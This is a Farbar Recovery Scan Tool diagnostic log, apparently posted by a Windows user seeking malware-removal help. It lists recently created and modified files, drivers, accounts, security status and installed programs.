R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [91384 2022-06-22] (Microsoft Windows -> Microsoft Corporation)
S3 cpuz150; \??\C:\WINDOWS\temp\cpuz150\cpuz150_x64.sys [X]
S3 equ8_helper; \??\C:\WINDOWS\system32\DRIVERS\equ8_helper.sys [X]
S3 wtbt; \??\c:\program files (x86)\steam\steamapps\common\super people playtest\engine\binaries\thirdparty\wondertrust\wtdrv64.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One month (created) (Whitelisted) =========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2022-07-15 22:41 - 2022-07-15 22:42 - 000000000 ____D C:\AdwCleaner
2022-07-15 22:41 - 2022-07-15 22:41 - 008551608 _____ (Malwarebytes) C:\Users\Miggy\Downloads\AdwCleaner.exe
2022-07-15 22:32 - 2022-07-16 12:15 - 000083675 _____ C:\Users\Miggy\Downloads\Addition.txt
2022-07-15 22:31 - 2022-07-16 14:41 - 000027363 _____ C:\Users\Miggy\Downloads\FRST.txt
2022-07-15 22:31 - 2022-07-16 14:41 - 000000000 ____D C:\FRST
2022-07-15 22:31 - 2022-07-15 22:31 - 002369536 _____ (Farbar) C:\Users\Miggy\Downloads\FRST64.exe
2022-07-15 22:20 - 2022-07-15 22:20 - 000000000 ____D C:\Users\Miggy\AppData\Local\chrome_tab
2022-07-15 18:39 - 2022-07-15 18:40 - 060178785 _____ C:\Users\Miggy\Downloads\dokkan-scout.exe
2022-07-14 14:26 - 2022-07-14 14:26 - 000000000 ____D C:\Users\Miggy\AppData\Local\Enverr
2022-07-13 22:29 - 2022-07-13 22:29 - 000000220 _____ C:\Users\Miggy\Desktop\Garry's Mod.url
2022-07-13 18:34 - 2022-07-13 18:34 - 000693248 _____ C:\WINDOWS\system32\FsNVSDeviceSource.dll
2022-07-13 18:34 - 2022-07-13 18:34 - 000470528 _____ (curl, hxxps://curl.se/) C:\WINDOWS\SysWOW64\curl.exe
2022-07-13 18:34 - 2022-07-13 18:34 - 000026624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mode.com
2022-07-13 18:34 - 2022-07-13 18:34 - 000018944 _____ C:\WINDOWS\SysWOW64\WsdProviderUtil.dll
2022-07-13 18:34 - 2022-07-13 18:34 - 000017920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tree.com
2022-07-13 18:34 - 2022-07-13 18:34 - 000012800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\chcp.com
2022-07-13 18:33 - 2022-07-13 18:33 - 002260480 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000640512 _____ C:\WINDOWS\system32\SettingSyncDownloadHelper.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000530944 _____ (curl, hxxps://curl.se/) C:\WINDOWS\system32\curl.exe
2022-07-13 18:33 - 2022-07-13 18:33 - 000288768 _____ C:\WINDOWS\system32\Windows.Management.InprocObjects.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000270848 _____ C:\WINDOWS\system32\EsclScan.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000152064 _____ C:\WINDOWS\system32\EsclProtocol.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000061952 _____ C:\WINDOWS\system32\printticketvalidation.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000057344 _____ C:\WINDOWS\system32\APMonUI.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\mode.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000024576 _____ C:\WINDOWS\system32\WsdProviderUtil.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\tree.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\chcp.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000011811 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2022-07-13 18:26 - 2022-07-13 18:26 - 000000000 ___HD C:\$WinREAgent
2022-07-13 12:49 - 2022-07-13 12:49 - 000000222 _____ C:\Users\Miggy\Desktop\Batman Arkham City GOTY.url
2022-07-12 17:37 - 2022-07-12 17:37 - 000000000 ____D C:\Users\Miggy\AppData\Local\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000001032 _____ C:\Users\Public\Desktop\ONN..lnk
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\Program Files (x86)\ONN
2022-07-12 17:36 - 2019-10-10 08:59 - 000024784 _____ (0) C:\WINDOWS\system32\Drivers\HHTHid.sys
2022-07-12 17:36 - 2019-10-10 08:59 - 000023896 _____ (0) C:\WINDOWS\system32\Drivers\HHTHidMouFiltr.sys
2022-07-12 17:35 - 2022-07-12 17:36 - 091204040 _____ () C:\Users\Miggy\Downloads\Onn Setup20211115V1.0.0.5.05 (1).exe
2022-07-12 17:35 - 2022-07-12 17:35 - 091204040 _____ () C:\Users\Miggy\Downloads\Onn Setup20211115V1.0.0.5.05.exe
2022-07-11 22:18 - 2022-07-11 22:18 - 000000223 _____ C:\Users\Miggy\Desktop\Fears to Fathom - Episode 2.url
2022-07-11 16:14 - 2022-07-11 16:14 - 000000000 ____D C:\Program Files\EA Games
2022-07-11 15:32 - 2022-07-11 15:32 - 000013970 _____ C:\WINDOWS\system32\Tasks\chrome tab
2022-07-10 16:25 - 2022-07-10 16:25 - 000000000 ____D C:\Users\Miggy\Documents\New folder
2022-07-07 22:26 - 2022-07-09 19:54 - 000000000 ____D C:\Program Files\Mozilla Firefox
2022-07-05 18:55 - 2022-07-14 16:27 - 000000000 ____D C:\Program Files (x86)\Origin Games
2022-07-05 18:55 - 2022-07-05 18:55 - 000000000 ____D C:\Users\Miggy\AppData\Local\Haze1
2022-07-05 18:54 - 2022-07-05 18:54 - 000001066 _____ C:\Users\Public\Desktop\Origin.lnk
2022-07-05 18:54 - 2022-07-05 18:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2022-07-05 18:54 - 2022-07-05 18:54 - 000000000 ____D C:\Program Files (x86)\Origin
2022-07-05 18:53 - 2022-07-14 20:33 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Origin
2022-07-03 14:39 - 2022-07-03 14:39 - 000000000 ____D C:\Users\Miggy\Documents\WB Games
2022-07-03 14:39 - 2022-07-03 14:39 - 000000000 ____D C:\Users\Miggy\AppData\Local\Downloaded Installations
2022-06-27 18:02 - 2022-06-27 18:02 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Ardent Studios
2022-06-27 18:01 - 2022-06-27 18:01 - 000000223 _____ C:\Users\Miggy\Desktop\Smithworks.url
2022-06-26 22:13 - 2022-06-26 22:13 - 000000012 _____ C:\Users\Miggy\AppData\Roaming\asof
2022-06-24 21:24 - 2022-06-24 21:24 - 000000000 ____D C:\Users\Miggy\Documents\Telltale Games
2022-06-24 17:10 - 2022-06-24 17:10 - 000000000 ____D C:\Users\Miggy\Documents\Square Enix
2022-06-23 22:51 - 2022-06-23 22:51 - 000000000 ____D C:\Users\Miggy\AppData\Local\TJoC_R
2022-06-22 22:58 - 2022-07-15 23:03 - 000001130 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk
2022-06-22 22:50 - 2022-07-16 13:39 - 000001064 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk
2022-06-22 20:31 - 2022-06-22 20:31 - 000000000 ____D C:\Users\Miggy\AppData\Local\Visage
2022-06-21 13:02 - 2022-06-21 13:02 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Mediatonic
2022-06-21 13:02 - 2022-06-21 13:02 - 000000000 ____D C:\Users\Miggy\AppData\Local\EOSUserHelper
2022-06-21 12:26 - 2022-06-22 20:22 - 000000000 ____D C:\Users\Miggy\AppData\Local\TwistedCarnivalDemo2
2022-06-20 17:27 - 2022-06-20 17:28 - 060760073 _____ C:\Users\Miggy\Downloads\Pokemon - SoulSilver Version (USA, Australia).zip
2022-06-20 17:22 - 2022-06-20 17:28 - 000000000 ____D C:\Users\Miggy\Downloads\desmume-0.9.13-win64
2022-06-20 17:22 - 2022-06-20 17:22 - 006086795 _____ C:\Users\Miggy\Downloads\desmume-0.9.13-win64.zip
2022-06-19 19:14 - 2022-07-10 16:26 - 000000000 ____D C:\Users\Miggy\Documents\Electronic Arts
2022-06-19 18:44 - 2014-09-16 18:45 - 000447752 _____ (On2.com) C:\WINDOWS\SysWOW64\vp6vfw.dll
2022-06-19 18:24 - 2022-06-19 18:32 - 000000000 ____D C:\ProgramData\EA Desktop
2022-06-19 18:24 - 2022-06-19 18:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\Electronic Arts
2022-06-19 18:24 - 2022-06-19 18:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\EADesktop
2022-06-19 18:24 - 2022-06-19 18:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EA
2022-06-19 18:23 - 2022-06-19 18:23 - 001361536 _____ (Electronic Arts) C:\Users\Miggy\Downloads\EAappInstaller.exe
2022-06-19 12:31 - 2022-06-19 12:31 - 000953171 _____ C:\Users\Miggy\Downloads\pluto_t5_full_game.torrent
2022-06-19 12:29 - 2022-06-19 12:29 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qBittorrent
2022-06-19 12:29 - 2022-06-19 12:29 - 000000000 ____D C:\Program Files (x86)\qBittorrent
2022-06-18 19:50 - 2022-06-18 19:50 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\HotPink and Annue
2022-06-16 19:23 - 2022-06-16 19:23 - 000104448 _____ C:\WINDOWS\system32\nettraceex.dll
2022-06-16 19:22 - 2022-06-16 19:22 - 001333760 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2022-06-16 19:22 - 2022-06-16 19:22 - 000232288 _____ C:\WINDOWS\system32\containerdevicemanagement.dll
 
==================== One month (modified) ==================
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2022-07-16 14:42 - 2020-07-31 19:24 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\discord
2022-07-16 14:40 - 2020-07-31 19:08 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Spotify
2022-07-16 14:36 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2022-07-16 14:36 - 2019-12-07 02:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-07-16 14:32 - 2020-11-24 16:45 - 000000000 ____D C:\Program Files (x86)\Steam
2022-07-16 14:15 - 2020-07-31 18:23 - 000000000 ____D C:\Program Files (x86)\Google
2022-07-16 14:06 - 2020-07-31 19:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\Discord
2022-07-16 13:39 - 2022-05-17 17:09 - 000002493 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk
2022-07-16 13:39 - 2022-05-12 17:24 - 000001386 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
2022-07-16 13:39 - 2021-07-09 21:35 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2022-07-16 13:39 - 2020-08-10 01:20 - 000011819 _____ C:\ProgramData\DisplaySessionContainer13.log_backup1
2022-07-16 13:39 - 2020-08-09 21:02 - 000012424 _____ C:\ProgramData\DisplaySessionContainer12.log_backup1
2022-07-16 13:39 - 2020-08-01 19:19 - 000001270 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk
2022-07-16 13:39 - 2020-07-31 20:28 - 000000001 _____ C:\WINDOWS\vgkbootstatus.dat
2022-07-16 13:39 - 2020-07-31 18:24 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2022-07-16 13:39 - 2020-02-05 16:07 - 000015984 _____ C:\ProgramData\DisplaySessionContainer1.log_backup1
2022-07-16 13:39 - 2020-02-05 16:06 - 000000000 ____D C:\ProgramData\NVIDIA
2022-07-16 13:38 - 2020-07-31 19:48 - 000000000 ____D C:\ProgramData\Riot Games
2022-07-16 13:37 - 2020-08-02 14:57 - 000000000 ____D C:\ProgramData\Origin
2022-07-16 13:36 - 2021-11-03 16:17 - 000000000 ____D C:\Users\Miggy\AppData\Local\Origin
2022-07-16 12:10 - 2020-07-31 20:07 - 000000000 ____D C:\Users\Miggy\AppData\Local\CrashDumps
2022-07-16 12:08 - 2021-11-13 19:25 - 000004152 _____ C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{1A3EA42E-993D-412D-B564-43DC52E6644C}
2022-07-16 12:08 - 2021-07-09 21:35 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Mozilla
2022-07-16 12:07 - 2020-07-31 19:11 - 000000000 ____D C:\Users\Miggy\AppData\Local\Spotify
2022-07-16 12:06 - 2020-08-13 00:26 - 000002438 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-07-16 12:06 - 2020-08-13 00:26 - 000002276 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2022-07-16 12:06 - 2020-08-04 16:40 - 000000000 ___RD C:\Users\Miggy\Creative Cloud Files
2022-07-16 12:06 - 2019-12-07 02:14 - 000000000 ___HD C:\Program Files\WindowsApps
2022-07-16 12:05 - 2020-07-31 18:18 - 000000000 ___RD C:\Users\Miggy\OneDrive
2022-07-15 23:03 - 2020-08-07 18:48 - 000013483 _____ C:\ProgramData\DisplaySessionContainer10.log_backup1
2022-07-15 19:54 - 2020-08-10 15:18 - 000013155 _____ C:\ProgramData\DisplaySessionContainer14.log_backup1
2022-07-15 19:54 - 2020-08-09 20:14 - 000012819 _____ C:\ProgramData\DisplaySessionContainer11.log_backup1
2022-07-15 19:01 - 2020-08-04 16:37 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2022-07-15 18:31 - 2020-11-06 18:11 - 000000000 ___HD C:\adobeTemp
2022-07-14 20:33 - 2020-08-01 09:48 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2022-07-14 14:33 - 2022-06-05 15:02 - 000000000 ____D C:\Users\Miggy\Documents\MEGAsync Downloads
2022-07-14 11:39 - 2019-12-07 02:13 - 000000000 ____D C:\WINDOWS\INF
2022-07-14 11:36 - 2021-03-15 13:25 - 000840598 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2022-07-14 11:32 - 2021-03-15 13:21 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2022-07-14 11:32 - 2021-03-15 13:17 - 000008192 ___SH C:\DumpStack.log.tmp
2022-07-14 11:32 - 2020-07-31 18:36 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2022-07-13 23:07 - 2021-03-15 13:17 - 000257904 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2022-07-13 23:07 - 2020-07-31 20:17 - 000000000 ____D C:\Program Files\Riot Vanguard
2022-07-13 23:07 - 2019-12-07 02:03 - 001048576 _____ C:\WINDOWS\system32\config\BBI
2022-07-13 23:06 - 2021-03-15 13:18 - 000000000 ____D C:\Users\Miggy
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SystemResources
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\setup
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\es-MX
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\DDFs
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2022-07-13 22:47 - 2020-08-01 12:57 - 000001425 _____ C:\Users\Miggy\Desktop\Roblox Player.lnk
2022-07-13 22:47 - 2020-08-01 12:52 - 000001248 _____ C:\Users\Miggy\Desktop\Roblox Studio.lnk
2022-07-13 22:47 - 2020-08-01 12:52 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Roblox
2022-07-13 18:36 - 2019-12-07 02:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2022-07-13 18:33 - 2021-03-15 13:19 - 003010560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2022-07-13 18:26 - 2020-08-01 15:02 - 000000000 ____D C:\WINDOWS\system32\MRT
2022-07-13 18:23 - 2020-08-01 15:02 - 146546848 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2022-07-13 18:22 - 2020-01-24 10:48 - 000000000 ____D C:\Program Files (x86)\AMD
2022-07-13 13:03 - 2021-03-15 13:17 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2022-07-12 23:49 - 2021-01-02 18:45 - 000000000 ____D C:\Users\Miggy\AppData\Local\Battle.net
2022-07-12 13:10 - 2020-10-08 10:01 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\SurvivioSteam
2022-07-11 22:21 - 2022-01-22 00:32 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Rayll
2022-07-11 01:10 - 2021-03-19 22:09 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Vortex
2022-07-11 00:47 - 2022-04-09 15:31 - 000000000 ____D C:\Users\Miggy\AppData\Local\FalloutNV
2022-07-11 00:46 - 2021-12-28 23:14 - 000000000 ____D C:\Users\Miggy\AppData\Local\Fallout4
2022-07-10 22:27 - 2022-01-10 16:17 - 000001976 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk
2022-07-10 19:31 - 2021-05-01 00:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\BattlEye
2022-07-10 16:17 - 2020-08-04 16:36 - 000000000 ____D C:\Program Files\Adobe
2022-07-10 16:04 - 2020-10-10 20:06 - 000000000 ____D C:\Users\Miggy\Documents\My Games
2022-07-10 15:38 - 2021-07-16 15:06 - 000000000 ____D C:\Users\Miggy\AppData\Local\Ubisoft Game Launcher
2022-07-09 19:54 - 2021-07-09 21:35 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2022-07-08 21:35 - 2021-11-22 21:01 - 000144872 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamelaunchhelper.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 002754024 _____ (Microsoft Corporation) C:\WINDOWS\system32\xgameruntime.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000402920 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameplatformservices.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000234984 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingservicesproxy.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000198096 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameconfighelper.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000131072 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingtcuihelpers.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000067048 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamemodcontrol.exe
2022-07-08 20:35 - 2021-10-15 21:59 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2022-07-07 19:00 - 2021-01-02 18:45 - 000000000 ____D C:\Program Files (x86)\Battle.net
2022-07-07 15:34 - 2020-07-31 20:34 - 000000000 ____D C:\Users\Miggy\AppData\Local\D3DSCache
2022-07-05 15:18 - 2022-03-12 10:58 - 000000000 ____D C:\Users\Miggy\Desktop\RPCS3
2022-07-05 14:47 - 2021-12-10 22:51 - 000003592 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-2826498334-1472090739-1589450912-1002
2022-07-05 14:47 - 2021-03-15 13:21 - 000003364 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2826498334-1472090739-1589450912-1002
2022-07-05 14:47 - 2021-03-15 13:18 - 000002383 _____ C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2022-07-04 20:17 - 2020-07-31 18:24 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2022-07-02 23:24 - 2020-01-24 10:41 - 000000000 __RHD C:\Users\Public\AccountPictures
2022-06-26 22:13 - 2020-08-23 13:56 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\MMFApplications
2022-06-25 14:08 - 2020-01-24 10:41 - 000000000 ____D C:\ProgramData\Packages
2022-06-23 22:51 - 2020-07-31 20:34 - 000000000 ____D C:\Users\Miggy\AppData\Local\UnrealEngine
2022-06-23 18:25 - 2022-06-05 14:55 - 000000000 ____D C:\Users\Miggy\AppData\Local\MEGAsync
2022-06-22 22:58 - 2020-09-25 11:07 - 000000000 ____D C:\Users\Public\Documents\Adobe
2022-06-22 22:58 - 2020-08-04 16:36 - 000000000 ____D C:\Program Files\Common Files\Adobe
2022-06-22 22:48 - 2020-08-04 16:37 - 000000000 ____D C:\ProgramData\Adobe
2022-06-22 20:30 - 2022-05-12 17:28 - 000000000 ____D C:\XboxGames
2022-06-22 20:30 - 2020-07-31 18:16 - 000000000 ____D C:\Users\Miggy\AppData\Local\Packages
2022-06-22 17:19 - 2020-08-04 16:35 - 000000000 ____D C:\Users\Miggy\AppData\Local\Adobe
2022-06-22 17:19 - 2019-07-31 00:08 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2022-06-21 23:56 - 2021-10-03 18:40 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\PowerLine Studios
2022-06-21 13:02 - 2021-12-29 17:50 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\EasyAntiCheat
2022-06-21 11:46 - 2020-08-01 22:42 - 000000000 ____D C:\Program Files\Epic Games
2022-06-19 18:24 - 2021-07-12 18:14 - 000000000 ____D C:\Program Files\Electronic Arts
2022-06-19 18:24 - 2020-01-24 10:47 - 000000000 ____D C:\ProgramData\Package Cache
2022-06-19 15:51 - 2022-01-28 21:16 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\qBittorrent
2022-06-19 12:17 - 2021-12-25 13:22 - 000000000 ____D C:\Users\Miggy\AppData\Local\Activision
2022-06-18 21:54 - 2022-05-28 20:04 - 000000000 ____D C:\Program Files (x86)\Overwatch
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\lv-LV
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\lt-LT
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\et-EE
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\es-MX
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\ShellExperiences
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\lv-LV
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\lt-LT
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\et-EE
2022-06-17 18:18 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2022-06-17 18:18 - 2019-12-07 02:03 - 000000000 ____D C:\WINDOWS\servicing
 
==================== Files in the root of some directories ========
 
2021-05-18 08:49 - 2021-10-15 16:59 - 000000032 _____ () C:\Users\Miggy\AppData\Roaming\.machineId
2021-10-13 22:03 - 2021-10-13 22:03 - 000006889 _____ () C:\Users\Miggy\AppData\Roaming\9a25f6f6-1ec0-461f-a765-037f99a8a9eb.tmp
2022-06-26 22:13 - 2022-06-26 22:13 - 000000012 _____ () C:\Users\Miggy\AppData\Roaming\asof
2021-01-20 10:18 - 2021-01-20 10:18 - 000000116 _____ () C:\Users\Miggy\AppData\Roaming\debug.log
2022-03-08 21:51 - 2022-03-08 22:04 - 000000055 _____ () C:\Users\Miggy\AppData\Roaming\grizzly.ini
2020-11-28 13:16 - 2020-11-28 13:16 - 000000098 _____ () C:\Users\Miggy\AppData\Roaming\LauncherSettings_live.cfg
2020-11-28 12:39 - 2020-11-28 12:39 - 000002577 _____ () C:\Users\Miggy\AppData\Roaming\TheHunterSettings_live.bin
2020-11-28 13:06 - 2020-11-28 13:06 - 000000048 _____ () C:\Users\Miggy\AppData\Roaming\TheHunterSettings_steam_live.cfg
2020-08-04 16:43 - 2020-08-04 16:43 - 000000000 _____ () C:\Users\Miggy\AppData\Local\oobelibMkey.log
2021-10-18 17:32 - 2021-10-18 17:32 - 000016438 _____ () C:\Users\Miggy\AppData\Local\partner.bmp
 
==================== SigCheck ============================
 
(There is no automatic fix for files that do not pass verification.)
 
==================== End of FRST.txt ========================
Here's my addition.txt
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14-07-2022
Ran by Miggy (16-07-2022 14:42:10)
Running from C:\Users\Miggy\Downloads
Microsoft Windows 10 Home Version 21H2 19044.1826 (X64) (2021-03-15 20:22:02)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
 
(If an entry is included in the fixlist, it will be removed.)
 
Administrator (S-1-5-21-2826498334-1472090739-1589450912-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2826498334-1472090739-1589450912-503 - Limited - Disabled)
Guest (S-1-5-21-2826498334-1472090739-1589450912-501 - Limited - Disabled)
Miggy (S-1-5-21-2826498334-1472090739-1589450912-1002 - Administrator - Enabled) => C:\Users\Miggy
WDAGUtilityAccount (S-1-5-21-2826498334-1472090739-1589450912-504 - Limited - Disabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
7-Zip 21.02 alpha (x64) (HKLM\...\7-Zip) (Version: 21.02 alpha - Igor Pavlov)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 5.7.1.1 - Adobe Inc.)
Adobe Genuine Service (HKLM-x32\...\AdobeGenuineService) (Version: 7.7.0.35 - Adobe Inc.)
Adobe Illustrator 2022 (HKLM-x32\...\ILST_26_3_1) (Version: 26.3.1 - Adobe Inc.)
Adobe Photoshop 2022 (HKLM-x32\...\PHSP_23_4_1) (Version: 23.4.1.547 - Adobe Inc.)
Adobe Premiere Pro 2022 (HKLM-x32\...\PPRO_22_5) (Version: 22.5 - Adobe Inc.)
AMD Radeon Settings (HKLM\...\WUCCCApp) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 19.10.16 - Advanced Micro Devices, Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach)
Balanced (HKLM-x32\...\{0EA45DD4-A825-420C-AFED-C659EFE3B84F}) (Version: 4.00.0000 - Advanced Micro Devices, Inc.) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Discord (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Discord) (Version: 0.0.309 - Discord Inc.)
Dolphin (HKLM-x32\...\Dolphin) (Version: 5.0 - Dolphin Team)
EA app (HKLM\...\{C2622085-ABD2-49E5-8AB9-D3D6A642C091}) (Version: 12.0.229.5212 - Electronic Arts) Hidden
EA app (HKLM-x32\...\{c5b4b74e-fcb0-4603-b92d-3d17c96a6d69}) (Version: 12.0.229.5212 - Electronic Arts)
Epic Games Launcher (HKLM-x32\...\{0EE6DDEF-E36B-45EB-9E03-5A266EC8A8F8}) (Version: 1.1.279.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Epic Online Services (HKLM-x32\...\{4B31654B-80C2-405C-91C9-49B14AEB0F42}) (Version: 2.0.32.0 - Epic Games, Inc.)
Fallout: New Vegas (HKLM-x32\...\Fallout: New Vegas_is1) (Version:  - )
FL Studio 20 (HKLM-x32\...\FL Studio 20) (Version:  - Image-Line)
